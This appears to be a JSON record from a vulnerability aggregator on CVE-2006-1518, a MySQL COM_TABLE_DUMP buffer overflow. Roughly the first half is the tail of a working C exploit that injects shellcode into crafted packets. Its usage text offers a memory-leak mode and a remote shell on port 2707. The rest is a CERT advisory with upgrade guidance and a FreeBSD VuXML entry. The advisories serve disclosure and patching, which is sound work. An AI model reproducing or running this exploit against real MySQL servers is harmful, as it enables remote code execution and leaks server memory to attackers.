(\"p:%d\\n\", position);\n\t for (o = position + 4; o > position; o--)\n\t query_payload[o] = addr_ret[tmp_idx++];\n\n\t tmp_idx = 0;\n\t for (o = position + 8; o > position + 4; o--)\n\t query_payload[o] = addr_tdh[tmp_idx++];\n\n\t tmp_idx = 0;\n\t for (o = position + 12; o > position + 8; o--)\n\t query_payload[o] = addr_tbl[tmp_idx++];\n\n\t}\n\n#endif\n\n tmp_idx = 0;\n for (o = SHL_POS; o < SHL_POS + 84; o++)\n\tquery_payload[o] = shcode[tmp_idx++];\n\n printf (\"entro\\n\");\n buf1 = query_payload;\n len1 = payload_len;\n }\n else if (d >= 3)\n {\n printf (\"entro\\n\");\n\n // prepare table_dump request - PACK_LEN, 0x00, 0x00, 0x00, COM_TABLE_DUMP (0x13), DB_NAME_LEN (2) , RANDOM_CHAR (=0x73)\n buf1 = table_dump_packet;\n if (dblen >= 0)\n\tbuf1[5] = (char) dblen;\n printf (\"%x\", (char) dblen);\n len1 = dump_packet_len;\n }\n d++;\n\n printf (\"\\nClient -> Server\\n\");\n if (hexdump)\n {\n for (i = 0; i < len1; i++)\n\tprintf (\" %.2x%c\", (unsigned char) buf1[i],\n\t\t((i + 1) % 16 ? ' ' : '\\n'));\n printf (\"\\n\");\n for (i = 0; i < len1; i++)\n\t{\n\t unsigned char f = (unsigned char) buf1[i];\n\t printf (\" %.2c%2c\", (isprint (f) ? f : '.'),\n\t\t (((i + 1) % 16) ? ' ' : '\\n'));\n\t}\n }\n if (send (fd, buf1, len1, 0) != len1)\n {\n perror (\"cli: send(buf3)\");\n exit (1);\n }\n\n\n\n fdest = fd;\n\n memset (buf, 0, 65535);\n ret = recv (fdest, buf, 65535, 0);\n printf (\"\\nServer -> Client\\n\");\n if (hexdump)\n {\n for (i = 0; i < ret; i++)\n\tprintf (\" %.2x%c\", (unsigned char) buf[i],\n\t\t((i + 1) % 16 ? ' ' : '\\n'));\n printf (\"\\n\");\n for (i = 0; i < ret; i++)\n\t{\n\t unsigned char f = (unsigned char) buf[i];\n\t printf (\" %.2c%2c\", (isprint (f) ? f : '.'),\n\t\t ((i + 1) % 16 ? ' ' : '\\n'));\n\t}\n }\n else\n {\n printf (\"\\n%s\\n\", buf + 5);\n }\n// printf(\"\\nSending to client\\n\");\n// ret= send(c, buf, ret, 0);\n\n return 0;\n}\n\nusage ()\n{\n printf\n (\"\\nusage my_exploit [-H] [-i] [-t 0xtable-address] [-a 0xthread-address] [[-s socket]|[-h host][-p port]][-x]\\n\\n\\\n-H: this Help;\\n\\\n-i: Information leak exploit (shows the content of MySql Server Memory)\\n\\\n-x: shows c/s communication output in hexadecimal\\n\\\n-t: hexadecimal table_list struct address (by default we try to find it automatically)\\n\\\n-a: hexadecimal thread struct address (look at the error log to see something like: thd=0x8b1b338)\\n\\\n-u: mysql username (anonymous too ;)\\n\\\n-p: mysql userpass (if you need it)\\n\\\n-s: the socket path if is a unix socket\\n\\\n-h: hostname or IP address\\n\\\n-P: port (default 3306)\\n\\n\\nExample_1 - Memoryleak: my_exploit -h 127.0.0.1 -u username -i\\n\\n\\\nExample_2 - Remote Shell on port 2707: my_exploit -h 127.0.0.1 -u username -a 0x8b1b338 -t 0x8b3a880\\n\\n\\\n \");\n\n}\n\nint\nmain (int argc, char *argv[])\n{\n\n int fdest = 0;\n int port = 3306;\n int shell = 1;\n int force_table = 0;\n char buf1[65535];\n char *socket;\n char *user = NULL;\n char *pass = NULL;\n char *host = NULL;\n socket = strdup (\"/tmp/mysql2.sock\");\n opterr = 0;\n\n while ((c = getopt (argc, argv, \"s:t:a:P:Hh:u:p:ix\")) != -1)\n switch (c)\n {\n case 's':\n\tsocket = (char *) optarg;\n\tbreak;\n case 't':\n\tforce_table = 1;\n\ttbl = (int) strtol (optarg, NULL, 16);\n\t//tbl=atoi( optarg );\n\tbreak;\n case 'a':\n\tthd = (int) strtol (optarg, NULL, 16);\n\tbreak;\n case 'u':\n\tuser = (char *) optarg;\n\tbreak;\n case 'p':\n\tpass = (char *) optarg;\n\tbreak;\n case 'P':\n\tport = atoi (optarg);\n\tbreak;\n case 'h':\n\thost = (char *) optarg;\n\tbreak;\n case 'i':\n\tshell = 0;\n\tbreak;\n case 'x':\n\thexdump = 1;\n\tbreak;\n case 'H':\n\tusage ();\n\treturn 1;\n default:\n\tbreak;\n }\n\n if (!force_table)\n tbl = thd + 0x1f548;\n conn = mysql_init (NULL);\n int ret = mysql_real_connect (conn,\t/* pointer to connection handler */\n\t\t\t\thost,\t/* host to connect to */\n\t\t\t\tuser,\t/* user name */\n\t\t\t\tpass,\t/* password */\n\t\t\t\tNULL,\t/* database to use */\n\t\t\t\t0,\t/* port (use default) */\n\t\t\t\tsocket,\t/* socket (use default) */\n\t\t\t\t0);\t/* flags (none) */\n\n if (!ret)\n {\n fprintf (stderr, \"Can't connect, error : %s\\n\", mysql_error (conn));\n return 1;\n }\n printf (\"using table_list:%x thread:%x\\n\", tbl, thd);\n\n fd = conn->net.fd;\n\n if (shell)\n {\n d = 2;\n sendit (buf1, fdest, -1);\n d = 3;\n sendit (buf1, fdest, -1);\n d = 3;\n sendit (buf1, fdest, -1);\n }\n else\n {\n int l;\n d = 3;\n for (l = 0; l < 256; l++)\n\t{\n\t sendit (buf1, fdest, l);\n\t}\n }\n mysql_close (conn);\n\n exit (0);\n}\n\n// milw0rm.com [2006-05-02]\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/1741/"}], "cert": [{"lastseen": "2020-09-18T20:43:06", "bulletinFamily": "info", "cvelist": ["CVE-2006-1518"], "description": "### Overview \n\nMySQL contains a buffer overflow that may allow a remote, authenticated attacker to execute arbitrary code on a vulnerable server.\n\n### Description \n\n**MySQL and COM_TABLE_DUMP**\n\n[MySQL](<http://www.mysql.com/>) is an open-source database system available for Microsoft Windows, Linux, and other UNIX-based operating systems. Command packets are sent to the MySQL server to issue instructions to that server. One such command packet type is COM_TABLE_DUMP, which the [MySQL Internals Manual](<http://downloads.mysql.com/docs/internals-en.pdf>) describes as: \n \n_COM_TABLE_DUMP (used by slave server to get master table)_ \n**The Problem** \n \nMySQL fails to properly validate user-controlled parameters within COM_TABLE_DUMP packets. If an attacker sends a series of specially crafted COM_TABLE_DUMP packets to a vulnerable MySQL server, that attacker may be able to cause a buffer overflow. \n \n**Considerations** \n \nSome level of authentication is needed to exploit this vulnerability. Exploit code for this vulnerability is publicly available \n \n--- \n \n### Impact \n\nA remote, authenticated attacker may be able to execute arbitrary code on a MySQL server. \n \n--- \n \n### Solution \n\n**Upgrade** \nThis issue is corrected in MySQL versions [4.0.27](<http://dev.mysql.com/doc/refman/4.1/en/news-4-0-27.html>), [4.1.19](<http://dev.mysql.com/doc/refman/4.1/en/news-4-1-19.html>), [5.0.21](<http://dev.mysql.com/doc/refman/5.0/en/news-5-0-21.html>), and [5.1.10](<http://dev.mysql.com/doc/refman/5.1/en/news-5-1-10.html>). Refer to the MySQL [downloads](<http://dev.mysql.com/downloads/>) page to get the appropriate updated version. \n \n--- \n \n \n**Disable anonymous access to MySQL** \n \nAlthough disabling anonymous access to MySQL does not prevent attacks from occurring, it does prevent unauthenticated users from attempting to exploit the vulnerability. \n \n--- \n \n### Vendor Information\n\n602457\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### MySQL AB __ Affected\n\nUpdated: May 05, 2006 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to the security fixes sections of:\n\n<http://dev.mysql.com/doc/refman/4.1/en/news-4-0-27.html> \n<http://dev.mysql.com/doc/refman/4.1/en/news-4-1-19.html> \n<http://dev.mysql.com/doc/refman/5.0/en/news-5-0-21.html> \n<http://dev.mysql.com/doc/refman/5.1/en/news-5-1-10.html>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23602457 Feedback>).\n\n### Red Hat, Inc. __ Not Affected\n\nUpdated: May 17, 2006 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nThis issue only affected version 5 of MySQL. All Red Hat Enterprise Linux releases shipped with MySQL versions prior to 5 and are not vulnerable to this issue.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://secunia.com/advisories/19929/>\n * <http://dev.mysql.com/doc/refman/4.1/en/news-4-0-27.html>\n * <http://dev.mysql.com/doc/refman/4.1/en/news-4-1-19.html>\n * <http://dev.mysql.com/doc/refman/5.0/en/news-5-0-21.html>\n * <http://dev.mysql.com/doc/refman/5.1/en/news-5-1-10.html>\n * <http://downloads.mysql.com/docs/internals-en.pdf>\n\n### Acknowledgements\n\nThis vulnerability was reported by Stefano Di Paola.\n\nThis document was written by Jeff Gennari.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-1518](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-1518>) \n---|--- \n**Severity Metric:** | 12.33 \n**Date Public:** | 2006-05-02 \n**Date First Published:** | 2006-05-05 \n**Date Last Updated: ** | 2006-05-17 12:24 UTC \n**Document Revision: ** | 40 \n", "modified": "2006-05-17T12:24:00", "published": "2006-05-05T00:00:00", "id": "VU:602457", "href": "https://www.kb.cert.org/vuls/id/602457", "type": "cert", "title": "MySQL fails to properly validate COM_TABLE_DUMP packets", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:44", "bulletinFamily": "unix", "cvelist": ["CVE-2006-1518"], "description": "\nStefano Di Paola reports:\n\nAn authenticated user could remotely execute arbitrary\n\t commands by taking advantage of a stack overflow.\nTo take advantage of these flaws an attacker should have\n\t direct access to MySQL server communication layer (port\n\t 3306 or unix socket). But if used in conjuction with some\n\t web application flaws (i.e. php code injection) an\n\t attacker could use socket programming (i.e. php sockets)\n\t to gain access to that layer.\n\n", "edition": 4, "modified": "2006-05-02T00:00:00", "published": "2006-05-02T00:00:00", "id": "A8D8713E-DC83-11DA-A22B-000C6EC775D9", "href": "https://vuxml.freebsd.org/freebsd/a8d8713e-dc83-11da-a22b-000c6ec775d9.html", "title": "mysql50-server -- COM_TABLE_DUMP arbitrary code execution", "type": "freebsd", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}